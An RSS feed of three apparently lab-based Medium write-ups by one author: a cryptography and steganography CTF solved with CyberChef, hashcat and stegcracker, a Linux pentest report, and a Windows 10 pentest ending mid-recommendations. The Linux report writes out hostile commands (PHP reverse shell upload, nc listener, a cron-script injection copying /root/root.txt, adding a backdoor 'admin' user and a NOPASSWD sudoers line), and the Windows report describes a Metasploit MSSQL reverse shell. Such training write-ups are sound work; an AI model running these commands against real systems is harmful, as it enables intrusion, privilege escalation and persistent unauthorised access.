<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Dom Ibanez on Medium]]></title>
        <description><![CDATA[Stories by Dom Ibanez on Medium]]></description>
        <link>https://medium.com/@ibanezdom96?source=rss-2e646eb867b1------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*JyJc3KF-XFPtrGPbY-TTNw.png</url>
            <title>Stories by Dom Ibanez on Medium</title>
            <link>https://medium.com/@ibanezdom96?source=rss-2e646eb867b1------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Tue, 19 May 2026 15:00:04 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@ibanezdom96/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Cryptography Challenge]]></title>
            <link>https://medium.com/@ibanezdom96/cryptography-challenge-1f12272c0db0?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/1f12272c0db0</guid>
            <category><![CDATA[steganography]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[cipher]]></category>
            <category><![CDATA[cryptography]]></category>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Wed, 24 Jul 2024 16:01:03 GMT</pubDate>
            <atom:updated>2024-07-24T16:01:03.736Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/899/1*UJiV05fXAmf_m05iB1iQ6A.png" /></figure><p>LINK TO CHALLENGE FILES: <a href="https://drive.google.com/drive/folders/1mEiKAbu9R3o8ty_xnmM7jOrBrnsn33h2?usp=drive_link">https://drive.google.com/drive/folders/1mEiKAbu9R3o8ty_xnmM7jOrBrnsn33h2?usp=drive_link</a></p><p>Challenge Walkthroughs</p><p>I. Challenge 1<br>• Identification of encoding(s), encryption(s), etc.<br>- It is an ascii string converted to hexadecimal then encoded in base64 notation<br>• Method(s) to decode/decrypt/etc.<br>- CyberChef decoding<br>• flag:{flag-one-is-easy}</p><ol><li>The first challenge is in a .txt file. It seems to be an encoded string.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/965/1*jEEK3fQIaeFZb8ntWKHamg.png" /></figure><p>2. From past cryptographic experience it looks to be a base64 encoding. We will use CyberChef to decipher it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fjUCkMf7Zxn1IMtjFkQoPg.png" /></figure><p>3. It has given us a hexadecimal value. We will decode it into ascii.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jrVm0oqqvPd48yrJg6mFXg.png" /></figure><p>The result: flag:{flag-one-is-easy}</p><p>II. Challenge 2<br>• Identification of encoding(s), encryption(s), etc.<br>- Decimal and Caesar ciphered ascii<br>• Method(s) to decode/decrypt/etc.<br>- Convert decimal to ascii then decode Caesar cipher<br>• Flag: flag:{secondFlag-is-moreDifficult}</p><ol><li>Flag 2 is yet another string in a .txt file. This time it is a series of decimal numbers.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jcIzMHHkvDxj2_CztZ7I8w.png" /></figure><p>2. The result is a seemingly random assortment of numbers, but through research and experience I have identified it as a Caesar cipher. 
A Caesar cipher is a type of substitution cipher, and it is one of the simplest and oldest methods of encryption. It was used by Julius Caesar, the Roman Emperor, and hence the name “Caesar cipher.”</p><p>Knowing that the flag is in the format of “flag:{flag-contents-here}” we can decode “synt” into “flag” and we will know the shift value. Since the letter “f” is 13 letters away from “s”, our shift value is 13.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hSvdIwpj40nDrbvPKTkX6g.png" /></figure><p>The result: flag:{secondFlag-is-moreDifficult}</p><p>III. Challenge 3<br>• Identification of encoding(s), encryption(s), etc.<br>- Hashed password: a6a7c0ce5a93f77cf3be0980da5f7da3<br>- 7zip folder that had a password.<br>• Method(s) to decode/decrypt/etc.<br>- Dictionary attack with hashcat<br>• Flag: flag:{youUsed-AcOo1-T0ol}</p><p>1. The third flag is in a password-protected zip file with an accompanying .txt file where the presumed password is stored. After several attempts at decoding the string there were no results. We will use a dictionary attack with Hashcat.</p><p>2. We will use a wordlist that comes with Kali; unzip it with this command: gzip -d /usr/share/wordlists/rockyou.txt.gz. Before you run the hashcat command, you might have to increase the memory allocated to your Kali machine, as I had to do the same.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vFZVR9Iuuh-BlzXyUgi1Sw.png" /></figure><p>3. Here is the execution of Hashcat.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2Og2GqwLQAtgDVsfoM8dHA.png" /></figure><p>4. The output will be in a cracked.txt file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bdAP5noljp5OH0GDp4wYbw.png" /></figure><p>5. Enter the password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zlJQeSM6JrsvLFLfG99Wwg.png" /></figure><p>6. 
The flag is here.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zQ9eju_9xohz2CSDVDrA3w.png" /></figure><p>Credits to: <a href="https://resources.infosecinstitute.com/topics/hacking/hashcat-tutorial-beginners/">https://resources.infosecinstitute.com/topics/hacking/hashcat-tutorial-beginners/</a></p><p><strong>IV. Challenge 4</strong><br>• Identification of encoding(s), encryption(s), etc.<br>- Message was hidden using the steghide embed functionality and protected by a password<br>• Method(s) to decode/decrypt/etc.<br>- The steg password was cracked by the rockyou.txt wordlist using stegcracker.</p><p>1. First try to gain information by using ExifTool. ExifTool is a powerful and versatile command-line utility used for reading, writing, and editing metadata in various media files, primarily images and videos. “Exif” stands for “Exchangeable Image File Format,” which is a standard for storing metadata in image files, including details such as camera settings, GPS location data, date and time, and much more.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AMTmQYFR-dfGvwlHnIt9Xw.png" /></figure><p>2. We will then try to extract the message using the steghide extract option. Unfortunately there is a password, so we need to crack it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/856/1*uy-z6Yduir8BMhppspg8YQ.png" /></figure><p>3. I renamed the file to “four.jpg” for easier typing. Then I ran: stegcracker four.jpg /usr/share/wordlists/rockyou.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1Vf_VMKIx16cEBiMt2m3Ng.png" /></figure><p>4. The function will return the hidden message. 
The flag is within the jpg.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SlcF8lONDtAc2FgJI4v-mA.png" /></figure><p>flag:{stegIs-Actu4llypR3ttyr4re?}</p><p>Credits to: <a href="https://medium.com/the-kickstarter/steganography-on-kali-using-steghide-7dfd3293f3fa">https://medium.com/the-kickstarter/steganography-on-kali-using-steghide-7dfd3293f3fa</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1f12272c0db0" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Pentesting with Privilege Escalation]]></title>
            <link>https://medium.com/@ibanezdom96/pentesting-with-privilege-escalation-fcf2b7fe6e1a?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/fcf2b7fe6e1a</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sat, 30 Mar 2024 23:04:59 GMT</pubDate>
            <atom:updated>2024-03-31T02:28:30.728Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1018/1*RdaCdBJ9L8sw_dgfViOISg.jpeg" /></figure><p><strong>Executive Summary</strong><br><br>The purpose of this penetration test is to assess the security posture of the machine deployed by “Web Application Labs Inc.” in their production DMZ network. I aim to identify vulnerabilities and weaknesses in the system that could potentially be exploited by attackers.</p><p>By simulating real-world attack scenarios, the penetration test aims to uncover any potential security flaws, misconfigurations, or vulnerabilities that could lead to unauthorized access or compromise of the system.</p><p>The ultimate goal is to provide actionable recommendations to the company to improve its security defenses and mitigate potential risks.<br><br><strong>IP Address or Hostname in Scope</strong></p><p>The listening or control machine for the test is 10.0.2.15.<br>The target machine IP is 10.0.2.8</p><p><strong>Penetration Test Type</strong></p><p>Based on the scenario provided, the penetration test being conducted can be categorized as a “Black Box” or “External” penetration test. A Black Box penetration test simulates an attacker without prior knowledge or internal access to the target system.</p><p>Specifically, the conducted Pentest is a combination of Network Penetration Test, Web Application Penetration Test, User Access, and Privilege Escalation.</p><p><strong>Fingerprinting</strong></p><ol><li>Network Scan (nmap -sn 10.0.2.0/24):<br>This step involves using the Nmap tool with the “-sn” option to perform a “ping sweep” scan on the network range 10.0.2.0/24. It sends ICMP echo requests (pings) to each IP address in the specified range to determine which hosts are online and responsive.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1019/1*drRbQTlFaydaS1FB3xCyZQ.png" /></figure><p>2. 
OS Scan (nmap -O 10.0.2.8):<br>This step utilizes Nmap’s OS detection feature (“-O”) to identify the operating system running on the target machine with the IP address 10.0.2.8. It sends specific probes and analyzes the responses to make an educated guess about the operating system in use.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1013/1*-FaYhiwPwOS8c3H1-h8E3Q.png" /></figure><p>3. Aggressive Scan (nmap -A 10.0.2.8):<br>An aggressive scan (“-A”) in Nmap combines several advanced techniques to gather more detailed information about the target system. It includes OS detection, version detection of running services, script scanning, and traceroute to provide a comprehensive analysis.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vjfhtrS5LO0xYmHPcN76TA.png" /></figure><p>4. Noting Open Ports:<br>Throughout the scans performed in steps 2 and 3, open ports on the target machine are identified. Open ports indicate which network services are running and accessible on the target system. This helps in understanding potential entry points for further enumeration and exploitation.<br>• 21/tcp open ftp vsftpd 3.0.3<br>• 80/tcp open http Apache httpd 2.4.53 ((CentOS Stream))</p><p>5. Nikto Scan (nikto -h 10.0.2.8):<br>The command “nikto -h 10.0.2.8” initiates a scan using the Nikto tool against the target machine with the IP address 10.0.2.8. Nikto is a web vulnerability scanner that identifies known vulnerabilities in web applications, servers, and scripts. It checks for common issues like outdated software versions, misconfigurations, and other security weaknesses.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UsOx6lboQ3QUbZwKj1hX7Q.png" /></figure><p>6. Noting Revealed Directories:<br>During the Nikto scan, directories and paths exposed by the target web server are identified. 
These directories can provide valuable information about the structure of the web application and potentially reveal sensitive or hidden content.</p><p>• /Bwf3fN2v.php<br>• /ftp/<br>• /robots.txt<br>• /Administration/<br>• /info.php<br>• /icons/<br>• /icons/README</p><p>7. Exploring Directories:<br>After noting the directories revealed in the previous step, further investigation is conducted by manually accessing and exploring these directories. This allows for potential discovery of additional files, endpoints, or vulnerabilities.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yBYHsdLsPCyS8Lsp1a43og.png" /><figcaption>/Bwf3fN2v.php</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1GfTG4bRrJNkPNdDH5onIw.png" /><figcaption>/ftp/</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UqvvpORHb60hfZPS_4O2lQ.png" /><figcaption>/robots.txt</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t6P64Lyq9TGrKYcvOmz9xA.png" /><figcaption>/Administration/</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_u0hQfOGU81LZQ9AFSpjXg.png" /><figcaption>/info.php</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kv-xyRSgDsn7Qine0bq7lA.png" /><figcaption>/icons/</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/975/1*5vO1FsU24nwPJA-qzCSQRQ.png" /><figcaption>/icons/README</figcaption></figure><p>8. The presence of directives in the robots.txt file disallowing access to FTP and administration paths could indicate potential vulnerabilities or sensitive areas that the website owner intends to protect. However, it’s important to note that the presence of these directives alone does not guarantee the existence of vulnerabilities. 
It simply suggests that the website owner wants to restrict access to certain areas of the website or web application.</p><p>To determine if there are exploitable vulnerabilities related to FTP or administration, further investigation and testing would be required.</p><p><strong>Vulnerability Analysis</strong></p><p>Approach: Conducted a Black Box/External penetration test on a machine in the production DMZ network. Utilized a reverse shell upload to gain user access. Exploited vulnerabilities or misconfigurations in Cron jobs for privilege escalation.</p><p>Emphasized identifying network configuration, networked services, local services, running processes, users and groups, scheduled tasks or jobs, filesystem contents, system parameters, and configuration files.</p><p><strong>Vulnerability Description</strong></p><ul><li>Weak Authentication and Base64 Encoding: The system allowed weak authentication, as evidenced by the base64-encoded password in the “user:b64:ZXQ3JlZFdVo=” format.</li></ul><p>Mitigation: Implement strong password policies and enforce the use of complex passwords. Do not rely on base64, which is a reversible encoding rather than encryption, to protect sensitive information.</p><ul><li>Unsecured File Upload and Execution:<br>The system permitted the upload and execution of a reverse shell script (PHP) without proper access controls or validation.</li></ul><p>Mitigation: Implement strict file upload controls, including validation of file types, proper file permissions, and scanning uploaded files for potential threats or malicious code.</p><ul><li>Misconfigured Scheduled Tasks (Cron Jobs):<br>The “/etc/crontab” file contained misconfigurations that allowed for unauthorized privilege escalation.</li></ul><p>Mitigation: Regularly review and validate the configurations of scheduled tasks (cron jobs). 
Ensure that only trusted and necessary tasks are scheduled and that they execute with the appropriate permissions.</p><ul><li>Insecure File Permissions:<br>The permissions for the reverse shell script were set to allow universal read, write, and execute access (777).</li></ul><p>Mitigation: Apply the principle of least privilege by granting permissions only to the necessary entities (users, groups, or roles). Follow best practices for file permissions to minimize the risk of unauthorized access or modification.</p><ul><li>Lack of Input Validation and Sanitization:<br>The system did not properly validate or sanitize user input, which allowed for the injection of malicious commands into the “/var/www/check/sh” file.</li></ul><p>Mitigation: Implement robust input validation and sanitization techniques to prevent injection attacks. Use secure coding practices, such as parameterized queries, to defend against SQL injection and similar vulnerabilities.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*UfiRnkMl6Gn1knTYxmfBHQ.png" /></figure><p><strong>Proof of Concept</strong></p><p>1. Investigating the Administration Directory (10.0.2.8/Administration/.passwd):</p><p>Access the administration directory using the URL “10.0.2.8/Administration/.passwd”. This directory may contain valuable information or potential vulnerabilities related to administration.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6K4rLbH-TVep6y6UkDMURA.png" /></figure><p>2. Decoding User Details:</p><p>Given the details “user:b64:ZXQ3JlZFdVo=”, deduce that the username is “user”. Base64-decode “ZXQ3JlZFdVo=” to recover the password, which is “et7&amp;VEuZ”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/908/1*vDzwXdJiyVX5FwAQsLO49g.png" /></figure><p>3. 
Uploading a Reverse Shell:</p><p>Download a reliable PHP reverse shell script from <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</a>. Change the port and IP to the listening machine, then upload the script to the target system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/908/1*6SB-v1lqrzn8ghehCoP7vA.png" /></figure><p>4. Change Permissions: Modify the permissions of the uploaded reverse shell script to ensure it can be executed. Use the command “chmod 777 &lt;uploaded-script.php&gt;”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nqbS7vpr7aMLLCfaJVv36g.png" /></figure><p>5. Open a Port Listener: Set up a port listener on port 4444 to establish a reverse shell connection. Use the command “nc -lvnp 4444”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LjUnEwUfI3jt8AjvA9W4jQ.png" /></figure><p>6. Find the User Flag: Once you have a reverse shell connection, navigate the system to locate the user flag.</p><p>The flag value is “acdb70ff7bb36fc94492cd6dd9896e99”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/974/1*5mXzC3Bm3whNIfjfi5Raaw.png" /></figure><p>&gt; acdb70ff7bb36fc94492cd6dd9896e99</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1001/1*qcu4KRWD_xFFL816A8lJ6w.png" /></figure><p>7. Look for Privilege Escalation Opportunities: Refer to <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation">https://book.hacktricks.xyz/linux-hardening/privilege-escalation</a> for various privilege escalation techniques. One method discussed is through scheduled tasks, which can be found in the “/etc/crontab” file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*b_4Bt7J0QStJubEmcylYlA.png" /></figure><p>8. 
Investigate the “/opt/backup.sh” File: Examine the “/opt/backup.sh” file for potential vulnerabilities or misconfigurations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xYpVkLoKtWxXqOfXqRJWxA.png" /></figure><p>9. Edit the “/var/www/check/sh” File: Identify that the “/var/www/check/sh” file is executed with root privileges. Modify the file’s contents to serve your objectives.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*A6sBpF00Y_VtLSnBg8tRUQ.png" /></figure><p>10. Insert Commands into the “/var/www/check/sh” File: Paste the following commands into the file:</p><p>• cat /root/root.txt &gt;&gt; /var/www/html/result.log<br>• useradd -m -p $(openssl passwd -1 password) -s /bin/bash admin<br>• echo “admin ALL=(ALL) NOPASSWD:ALL” &gt;&gt; /etc/sudoers</p><p>Each command performs a specific action, such as appending the root flag to a log file, creating a new user named “admin” with a hashed password, and granting administrative privileges to the “admin” user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pb2osf5IWCX5TlUN_dGMaQ.png" /></figure><p>11. Gain Access in Less Than 5 Minutes: By following the above steps, you should be able to establish a reverse shell, locate the user flag, and escalate privileges within a short timeframe.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*y6VKzTVgn_igS9s-kH9ChA.png" /></figure><p>12. Obtain Root Access: Enter the command “sudo -s” to switch to the root user and gain root access.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OiOWOMe6Q9mRjB192twA3g.png" /></figure><p>13. Confirm Root Access and Capture the Flag: Type “whoami” to confirm that you have root access. 
Capture the flag to signify the successful completion of the pentest.<br>456dcf6dc529e26940d6ae11fd3750f4</p><p><strong>Recommendations</strong></p><ul><li>Enforce Strong Password Policies:<br>Implement password complexity requirements, including a minimum length, a combination of alphanumeric and special characters, and regular password expiration. Educate users about the importance of using strong and unique passwords.</li><li>Implement Secure File Upload Controls:<br>Validate uploaded files for type and content integrity, ensuring they adhere to accepted file formats and specifications. Apply proper file permissions to uploaded files to prevent unauthorized execution or access.</li><li>Regularly Review and Secure Scheduled Tasks:<br>Periodically review and validate the configurations of scheduled tasks (cron jobs). Remove or disable any unnecessary or outdated tasks.<br>Ensure that scheduled tasks execute with the appropriate permissions and follow the principle of least privilege.</li><li>Apply Principle of Least Privilege:<br>Regularly review and adjust file permissions, granting access only to the necessary entities (users, groups, or roles). 
Limit the permissions granted to executable files, scripts, and directories to prevent unauthorized execution or modifications.</li><li>Implement Input Validation and Sanitization:<br>Validate and sanitize user input to prevent injection attacks, such as command injection, SQL injection, and cross-site scripting (XSS).<br>Use secure coding practices and input validation libraries to ensure the integrity and security of user-provided data.</li></ul><p><strong>References</strong></p><p>• <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation">https://book.hacktricks.xyz/linux-hardening/privilege-escalation</a><br>• <a href="https://www.redhat.com/sysadmin/introduction-vi-editor">https://www.redhat.com/sysadmin/introduction-vi-editor</a><br>• <a href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses">https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses</a><br>• <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</a><br>• <a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/">https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/</a><br>• <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation#cron-path">https://book.hacktricks.xyz/linux-hardening/privilege-escalation#cron-path</a><br>• <a href="https://askubuntu.com/questions/419548/how-to-set-up-a-root-cron-job-properly">https://askubuntu.com/questions/419548/how-to-set-up-a-root-cron-job-properly</a><br>• <a href="https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux">https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=fcf2b7fe6e1a" width="1" height="1" 
alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Pentest — Windows 10]]></title>
            <link>https://medium.com/@ibanezdom96/pentest-windows-10-37d8fb79baff?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/37d8fb79baff</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sun, 24 Mar 2024 03:36:17 GMT</pubDate>
            <atom:updated>2024-03-31T02:43:17.291Z</atom:updated>
            <content:encoded><![CDATA[<h3>Pentest — Windows 10</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lVJ7Mh_GxO7xQ_vKeT0mTg.png" /></figure><h3>Executive Summary</h3><p>The purpose of this penetration test is to identify vulnerabilities, assess security controls, and validate existing security measures on the Windows 10 system used as a testing server by one of the developers.</p><p>The director of IT has noted a potential risk with this setup and requires our expertise to evaluate the associated security implications. Through our testing, we aim to provide a comprehensive report detailing the vulnerabilities found, the level of risk they pose, and our recommended mitigation strategies.</p><p>This report will assist the director in making informed decisions about the continuation or discontinuation of this server’s use in the current form. It is our goal to help the organization improve their overall security posture, minimize risk, and ensure the server meets the organization’s security standards.</p><h3>Outline of the scope</h3><p>a. IP Address or Hostname in Scope</p><p>The target machine for this penetration test is the system with the IP address 10.0.2.7, which is part of the 10.0.2.0/24 subnet. The listening or control machine for the test is 10.0.2.15.</p><p>b. Penetration Test Type</p><p>The penetration test performed in this instance is an Internal Network Penetration Test, conducted on a single system. 
As an external contractor, I conducted the penetration test from within the organization’s internal network, with a particular focus on a Windows 10 server that has been utilized as a testing server by one of their developers.</p><p>I primarily employed a suite of tools available in Kali Linux, including nmap for network scanning and reconnaissance, and Metasploit for vulnerability scanning and exploit development.</p><h3>Findings</h3><h3>Fingerprinting</h3><p>During the fingerprinting phase of the penetration testing engagement, various scans were conducted to gather information about the target system at IP address 10.0.2.7. The results reveal the operating system, open ports, and identified services.</p><p>1. Network Scan:</p><p>We executed a network scan using the command: nmap -sn 10.0.2.0/24</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Xz0AqAr4QzR0Aa0FC2w_fw.png" /></figure><p>Identified the likely IP address of the target system as 10.0.2.7.</p><p>2. OS Scan:</p><p>We performed an OS scan to determine the operating system running on the target using the command: nmap -O 10.0.2.7</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EesWHGAZhH6X47p_NT3J-w.png" /></figure><p>Established that the target system is running a Microsoft Windows operating system.</p><p>3. 
Aggressive Scan:</p><p>Conducted an aggressive scan to gather comprehensive information using the command: nmap -A 10.0.2.7</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SmDxjRTXK_AjupVcOOyrnA.png" /></figure><p>Note the following open ports and services discovered on the target system:</p><p>· Port 135/tcp: Identified as Microsoft Windows RPC service.</p><p>· Port 139/tcp: Recognized as Microsoft Windows netbios-ssn (NetBIOS Session Service).</p><p>· Port 445/tcp: Detected as Microsoft Windows file sharing service (possibly Microsoft-DS).</p><p>· Port 1433/tcp: Identified as Microsoft SQL Server 2022 (Version 16.00.1000.00; RC0+).</p><h3>Vulnerability Analysis</h3><p>Vulnerability analysis is a vital part of cybersecurity management, aimed at identifying, quantifying, and prioritizing system vulnerabilities. This specific analysis of ports 135, 139, 445, and 1433, associated with Microsoft services, is crucial to ascertain the potential risks these services could pose.</p><p>By identifying vulnerabilities, the analysis aids in formulating effective mitigation strategies, from software patches to system configuration adjustments, or even complete system replacement when necessary. These evaluations are instrumental for meeting compliance with various security regulations and standards, such as GDPR or PCI-DSS. 
Furthermore, by pinpointing the most severe vulnerabilities, resources can be optimally allocated, enabling security teams to prioritize their remediation efforts effectively.</p><p>This proactive approach to cybersecurity, made possible through regular vulnerability assessments, equips organizations to address potential threats before they are exploited, strengthening their overall security stance.</p><h3>Vulnerability Description</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/710/1*a_lPdbuJGaJbEfosVqyjqg.png" /></figure><h3>Proof of Concept</h3><p>Now on to a demonstration of the exploit</p><ol><li>Our first step was to examine each open port on the target system for potential vulnerabilities. We started with port 135, a well-known port associated with Microsoft’s Distributed Component Object Model services. However, we found that we couldn’t access this port in this instance. This could suggest a well-configured firewall or other security controls that were protecting the port.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ov-RMm4lbenUW2TEvL0f1w.png" /></figure><p>2. Port 139 was initially used for SMB (Server Message Block) over the NetBIOS transport layer. NetBIOS facilitated communication among Windows computers within the same network. However, with advancements in SMB protocol, starting from Windows 2000, port 445 became the preferred choice, operating on a TCP stack for improved performance and security.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*daO-gATAHp3EE-xiZ8C4iQ.png" /></figure><p>3. Then, we attempted an anonymous connection to the SMB service on port 139 using the smbclient tool. The command we used was &lt;smbclient -L \\10.0.2.7\&gt;. This technique allows us to list SMB shares without providing any user credentials.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X9hXq56cLjH0AYMhZWKRtg.png" /></figure><p>The command returned a few share names. 
These share names indicate specific resources that are shared on the network. They could be directories or printers or any other resource that the system administrator decided to share.</p><p>4. We decided to investigate these shares further. Using the command smbclient -N \\10.0.2.7\, we connected to the SMB server at IP address 10.0.2.7, again without providing any user credentials. We then examined each share.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ayjq8yZ95MrZ2Dr2uSkG7g.png" /></figure><p>“ADMIN” and “C” shares were both inaccessible, suggesting some level of security controls in place.</p><p>5. “IPC” share was accessible but was empty.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1f40GeaCgTln3_MPYpLwNg.png" /></figure><p>6. “Management” share contained several directories.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VLFO8J8GabM3_DT8p2mxmg.png" /></figure><p>7. Upon closer examination, we found a note in the “Notes” directory under the “Management” share titled “deleteme.txt”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1018/1*GbdzKyau9Ztho406dXnGHA.png" /></figure><p>8. The text inside the note read, “5up3r53cur3P4s$!”. This looked like a password hint, so we noted it down for later use.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1022/1*G36fvlJzC3KUXONFbjt-pg.png" /></figure><p>9. Let’s boot up Metasploit.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1018/1*osqxMV1-acdTM9xADN_1xg.png" /></figure><p>10. Now look for vulnerabilities and exploits for port 1433 (MSSQL, as identified by the aggressive scan). The command search type:exploit port:1433 is used within the Metasploit Framework to search for exploits specifically targeting port 1433.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jHPwXDq13Zr3cGGKriwstQ.png" /></figure><p>11. 
Try the available exploits, starting with a wordlist attack.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*JFUT7Tfivb-DwjzkSgUHnA.png" /></figure><p>That did not work.</p><p>12. Let’s try a payload upload. As you can see, it takes credentials such as user and password as well as the target IP.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IrWBZ2g4FRbV9AKOaU7Uag.png" /></figure><p>13. Simply set the target to 10.0.2.7. It asks for a password. Let’s try “5up3r53cur3P4s$!” and then run it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S7RNCW4wLzKkvshzjXo-GQ.png" /></figure><p>14. The exploit worked. Now we have a reverse shell, and it’s time to search for the flag.</p><p>15. Now that we have access to the system, our final task was to search for the flag — a specific piece of information that would indicate our success in this penetration test. Depending on the rules of the engagement, the flag could be anywhere on the system, so we had to be thorough. In our case, the flag was the ultimate proof that we successfully penetrated the system, and its discovery was the final goal of our test.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*JgtxXNJJ63EzETA_7tSmdA.png" /></figure><p>16. Thank you for reading my guide!</p><p>Flag.txt: <strong>a378894502e83fa1aeb3dcaa97931c73</strong></p><h3>Recommendations</h3><p><strong>Vulnerability Identified</strong> — Insecure Share Access on SMB Server</p><p>During the pentesting engagement, an insecure share access vulnerability was identified on the SMB (Server Message Block) server running on IP address 10.0.2.7.</p><p>This vulnerability allows anonymous access to certain shares and could potentially lead to unauthorized access, data leakage, or other security risks.</p><p><strong>Mitigation Recommendations</strong></p><p>To mitigate the insecure share access vulnerability, I recommend the following actions:</p><p>1. 
